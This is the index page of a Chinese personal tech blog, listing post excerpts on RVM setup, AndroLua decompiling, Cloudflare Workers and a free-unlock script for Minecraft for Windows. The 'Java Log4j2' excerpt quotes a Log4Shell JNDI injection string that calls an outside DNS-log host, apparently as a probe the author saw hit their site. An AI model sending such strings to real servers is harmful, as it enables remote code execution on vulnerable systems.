

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/images/favicon.png">
  <link rel="icon" href="/images/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jiecs">
  <meta name="keywords" content="">
  
    <meta property="og:type" content="website">
<meta property="og:title" content="杰出兽的小宇宙">
<meta property="og:url" content="https://www.jiecs.top/index.html">
<meta property="og:site_name" content="杰出兽的小宇宙">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="Jiecs">
<meta name="twitter:card" content="summary_large_image">
  
  
     <meta name="description" content="偶尔写点技术记录，杂谈。杰出兽 jiecs jiecs_23 jiesou" /> <meta name="keywords" content="独立博客,杰出兽,我的世界,Minecraft,MCBE,哔哩哔哩" /> <link rel="alternate" type="application/atom+xml" title="RSS" href="/feed.xml"> <script type="text/javascript"> (function(c,l,a,r,i,t,y){ c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)}; t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i; y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "83h7yd1jzh"); </script>
  
  <title>杰出兽的小宇宙</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />





<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"www.jiecs.top","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":["home"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":false,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"e2bcbf5019e3c05e7631d4a3081b10d9","google":"G-8QKELED2GX","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 30vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>杰出兽的小宇宙</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/shuoshuo/">
                <i class="iconfont icon-comment"></i>
                说说
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/projects/">
                <i class="iconfont icon-code"></i>
                项目
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" href="javascript:;" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" target="_blank" rel="noopener" href="https://alongw.cn">
                    
                    阿龙博客
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://bingimg.jiecs.workers.dev/?idx=7') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text=""></span>
          
        </div>

        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      <div class="container nopadding-x-md">
        <div id="board"
          >
          
          <div class="container">
            <div class="row">
              <div class="col-12 col-md-10 m-auto">
                


  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/4a17b156/" target="_self">
          Hello World
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/4a17b156/" target="_self">
        <div>
          
          Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2022-03-25 12:02" pubdate>
              2022-03-25
            </time>
          </div>
        
        
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/816/" target="_self">
          RVM 在中国的安装
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/816/" target="_self">
        <div>
          
          CentOS 7 服务器要用到 Rush，就装 RVM 按道理安装应按很简单的，就两行命令但输进命令行还是一堆问题，什么“curl: (35) Encountered end of file”巴拉拉的，反正是网络问题 折腾了一天，终于在 Github 找到了 Amberwudi&#x2F;my_rvm_installer 1234567891011121314151617181920\[root@
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2022-02-06 12:34" pubdate>
              2022-02-06
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%8A%A8%E6%80%81/" class="category-chain-item">动态</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/%E6%97%A5%E5%B8%B8/">#日常</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
      <div class="col-12 col-md-4 m-auto index-img">
        <a href="/archives/764/" target="_self">
          <img src="https://gitlab.com/jiesou/Images/-/raw/main/Markor/2022/03/253-cover-MFWL免费解锁-Minecraft-for-Windows-（MCBE）一键脚本更新.png" srcset="/img/loading.gif" lazyload alt="[MFWL]免费解锁 Minecraft for Windows （MCBE）一键脚本更新">
        </a>
      </div>
    
    <article class="col-12 col-md-8 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/764/" target="_self">
          [MFWL]免费解锁 Minecraft for Windows （MCBE）一键脚本更新
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/764/" target="_self">
        <div>
          
          在很久之前我其实已经做了一个免费解锁 Minecraft for Windows 的一键脚本，其实比你现在 Github 等地方搜到的脚本都要早，之前是 2021-07-11 时隔半年现在来更新一下这个脚本也是看到了这个评论才想起我还有这个东西 下载城通网盘 文叔叔 Github（1.85 MB 三个脚本 附带图标和全部需要的资源） 就是个简单的 BAT 脚本，运行很快，文件也很小，比那些 EXE
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2022-01-26 11:54" pubdate>
              2022-01-26
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%AE%80%E5%8D%95%E6%8A%80%E6%9C%AF/" class="category-chain-item">简单技术</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/Windows/">#Windows</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
              <a href="/tags/Minecraft/">#Minecraft</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
      <div class="col-12 col-md-4 m-auto index-img">
        <a href="/archives/748/" target="_self">
          <img src="https://gitlab.com/jiesou/Images/-/raw/main/Markor/2022/03/862-cover_AndroLua+反编译与+Lua+反函数序列化.png" srcset="/img/loading.gif" lazyload alt="AndroLua 反编译与 Lua 反函数序列化">
        </a>
      </div>
    
    <article class="col-12 col-md-8 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/748/" target="_self">
          AndroLua 反编译与 Lua 反函数序列化
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/748/" target="_self">
        <div>
          
          使用 Lua 的 string.dump(function [,strip]) 可以将一个函数序列化为二进制方式表示的字符串，如果　 strip 为真值， 二进制代码块不携带该函数的调试信息 （局部变量名、行号等等）。你可以使用 loadstring 函数重新调用该序列化后的代码块，但通常无法再获得完整的源代码。AndroLua 默认也是使用此种方式“加密”代码的 本文可以在纯安卓环境下反序列化
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2022-01-04 17:15" pubdate>
              2022-01-04
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%AE%80%E5%8D%95%E6%8A%80%E6%9C%AF/" class="category-chain-item">简单技术</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/AndroLua/">#AndroLua</a>
            
              <a href="/tags/Lua/">#Lua</a>
            
              <a href="/tags/%E5%AE%89%E5%8D%93/">#安卓</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/731/" target="_self">
          Steam 被墙了
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/731/" target="_self">
        <div>
          
          Steam 被墙了。目前是 SNI 阻断 + DNS 污染（ERR_CONNECTION_RESET），不是最高级的阻断方式但也是相对高的了 2021.12.25 - 8时许
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-12-25 09:39" pubdate>
              2021-12-25
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%8A%A8%E6%80%81/" class="category-chain-item">动态</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/%E6%97%A5%E5%B8%B8/">#日常</a>
            
              <a href="/tags/%E6%B8%B8%E6%88%8F/">#游戏</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/722/" target="_self">
          Java Log4j2
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/722/" target="_self">
        <div>
          
          ${jndi:ldap:&#x2F;&#x2F;wy2gkk.dnslog.cn&#x2F;exp} 笑死，Wordpress 和 Java 有半毛钱关系
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-12-21 10:07" pubdate>
              2021-12-21
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%8A%A8%E6%80%81/" class="category-chain-item">动态</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/%E7%BD%91%E7%AB%99/">#网站</a>
            
              <a href="/tags/%E6%97%A5%E5%B8%B8/">#日常</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/710/" target="_self">
          杰出兽安卓APP 2.0 发布
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/710/" target="_self">
        <div>
          
          杰出兽安卓APP 2.0 终于正式发布了，历经约 6,48~,~~~ 秒的开发，杰出兽安卓APP现以全新的面貌重新展现在大家面前  约 75 天  本次更新使用基于 AndroLua_pro 的 FusionApp 2.0完全重构所有代码。并结合我自己反编译操作 FusionApp 本体所带来的一些特性，带来了以下特别的内容更新 完全支持 arm64-v8a（64 位）随着 arm-v9 将至，最
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-12-15 17:21" pubdate>
              2021-12-15
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99/" class="category-chain-item">这个网站</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/Lua/">#Lua</a>
            
              <a href="/tags/%E5%AE%89%E5%8D%93/">#安卓</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
              <a href="/tags/%E6%9D%B0%E5%87%BA%E5%85%BD%E5%AE%89%E5%8D%93APP/">#杰出兽安卓APP</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
      <div class="col-12 col-md-4 m-auto index-img">
        <a href="/archives/701/" target="_self">
          <img src="https://gitlab.com/jiesou/Images/-/raw/main/Markor/2022/03/056-cover_使你的Web站点全局变成黑白.jpg" srcset="/img/loading.gif" lazyload alt="使你的Web站点全局变成黑白">
        </a>
      </div>
    
    <article class="col-12 col-md-8 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/701/" target="_self">
          使你的Web站点全局变成黑白
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/701/" target="_self">
        <div>
          
          CSS样式代码： html {    filter: grayscale(100%);} 加上 &lt;style&gt; 标签放在页头就能将整个 HTML 包括图片等变成黑白 Wordpress 等可以直接使用主题中的页头脚本等功能（就是你放统计代码的地方）快速应用到整个站点  如果你需要在部分地方灵活应用黑白状态的话可以使用 Javascript 注入脚本 1document.getEleme
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-12-13 10:43" pubdate>
              2021-12-13
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99/" class="category-chain-item">这个网站</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/%E7%BD%91%E7%AB%99/">#网站</a>
            
              <a href="/tags/%E6%97%A5%E5%B8%B8/">#日常</a>
            
              <a href="/tags/JS/">#JS</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
    <article class="col-12 col-md-12 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/695/" target="_self">
          杰出兽安卓APP 2.0 预览
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/695/" target="_self">
        <div>
          
          关于杰出兽安卓APP 2.0 目前大多数内容都快写完了，以下是一些预览。不代表开发最终结果 首页文章列表等：  菜单页：   关于页：  快开发完毕的功能：
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-11-26 17:57" pubdate>
              2021-11-26
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%8A%A8%E6%80%81/" class="category-chain-item">动态</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/Lua/">#Lua</a>
            
              <a href="/tags/%E5%AE%89%E5%8D%93/">#安卓</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
              <a href="/tags/%E6%9D%B0%E5%87%BA%E5%85%BD%E5%AE%89%E5%8D%93APP/">#杰出兽安卓APP</a>
            
          </div>
        
      </div>
    </article>
  </div>

  <div class="row mx-auto index-card">
    
    
      <div class="col-12 col-md-4 m-auto index-img">
        <a href="/archives/686/" target="_self">
          <img src="https://gitlab.com/jiesou/Images/-/raw/main/Markor/2022/03/641-cover_使用+CloudflareWorkers+搭建简易一言服务.png" srcset="/img/loading.gif" lazyload alt="使用 CloudflareWorkers 搭建简易一言服务">
        </a>
      </div>
    
    <article class="col-12 col-md-8 mx-auto index-info">
      <h1 class="index-header">
        
        <a href="/archives/686/" target="_self">
          使用 CloudflareWorkers 搭建简易一言服务
        </a>
      </h1>

      <a class="index-excerpt" href="/archives/686/" target="_self">
        <div>
          
          CloudflareWorkers 是Cloudflare 推出的一项无服务器代码运行服务，国内一般叫边缘计算、云函数之类的。 CloudflareWorkers 主要支持 JavaScript、Rust、C、C++（泛指）可以部署一些简单的服务。官方给出的应用场景有根据用户 Header 自动修改域名（cn.google.com）、控制对于不同请求的不同 Cloudflare 配置之类的 Clo
        </div>
      </a>

      <div class="index-btm post-metas">
        
          <div class="post-meta mr-3">
            <i class="iconfont icon-date"></i>
            <time datetime="2021-11-12 16:41" pubdate>
              2021-11-12
            </time>
          </div>
        
        
          <div class="post-meta mr-3 d-flex align-items-center">
            <i class="iconfont icon-category"></i>
            

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%AE%80%E5%8D%95%E6%8A%80%E6%9C%AF/" class="category-chain-item">简单技术</a>
  
  

      </span>
    
  
</span>

          </div>
        
        
          <div class="post-meta">
            <i class="iconfont icon-tags"></i>
            
              <a href="/tags/%E7%BD%91%E7%AB%99/">#网站</a>
            
              <a href="/tags/%E7%A8%8B%E5%BA%8F/">#程序</a>
            
              <a href="/tags/Cloudflare/">#Cloudflare</a>
            
          </div>
        
      </div>
    </article>
  </div>



  <nav aria-label="navigation">
    <span class="pagination" id="pagination">
      <span class="page-number current">1</span><a class="page-number" href="/page/2/#board">2</a><a class="page-number" href="/page/3/#board">3</a><span class="space">&hellip;</span><a class="page-number" href="/page/7/#board">7</a><a class="extend next" rel="next" href="/page/2/#board"><i class="iconfont icon-arrowright"></i></a>
    </span>
  </nav>



              </div>
            </div>
          </div>
        </div>
      </div>
    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="/thanks" target="_blank" rel="nofollow noopener"><span>Thanks</span></a> | <a href="/feed.xml" target="_blank" rel="nofollow noopener"><span>RSS</span></a> | <a href="https://cf-workers-status-page-production.jiecs.workers.dev" target="_blank" rel="nofollow noopener"><span>Status</span></a> <br> Jiecs All Rights Reserved. 
    </div>
  
  
  
    <!-- 备案信息 ICP for China -->
    <div class="beian">
  <span>
    <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
      浙ICP备2021024503号
    </a>
  </span>
  
</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  

<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        jQuery.ajax({
          type: 'GET',
          url: 'https://v1.hitokoto.cn/?max_length=13',
          headers: {},
          dataType: 'json',
          success: function(result) {
            var apiText;
            if (result) {
              var keys = 'hitokoto'.split(',');
              if (result instanceof Array) {
                result = result[0];
              }
              for (const k of keys) {
                var value = result[k];
                if (typeof value === 'string') {
                  apiText = value;
                  break;
                } else if (value instanceof Object) {
                  result = value;
                }
              }
            }
            apiText ? typing(apiText) : typing(text);
          },
          error: function(xhr, status, error) {
            if (error) {
              console.error('Failed to request https://v1.hitokoto.cn/?max_length=13:', error);
            }
            typing(text);
          }
        })
      
    })(window, document);
  </script>




  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?e2bcbf5019e3c05e7631d4a3081b10d9";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-8QKELED2GX', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  

  

  

  

  
    
  




  
    <script  src="/js/img-lazyload.js" ></script>
  




  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>




  
<script src="/js/custom.js"></script>
<script src="/js/resize_image.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
